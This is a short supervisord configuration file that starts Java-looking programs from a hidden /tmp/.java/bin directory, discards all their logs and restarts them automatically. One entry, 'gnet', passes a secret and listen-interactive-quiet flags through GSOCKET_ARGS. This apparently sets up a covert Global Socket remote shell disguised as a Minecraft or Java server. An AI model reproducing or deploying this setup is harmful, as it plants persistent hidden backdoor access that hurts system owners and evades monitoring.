[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./bot.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./user-patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i9A3eD1J4K7c-8A1K6f9L2M34D9g8H6-b5j756C4a9f6X1eC-d1F9440d6A28-039A1c0J1g6m3 -liq"
command=./bot.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true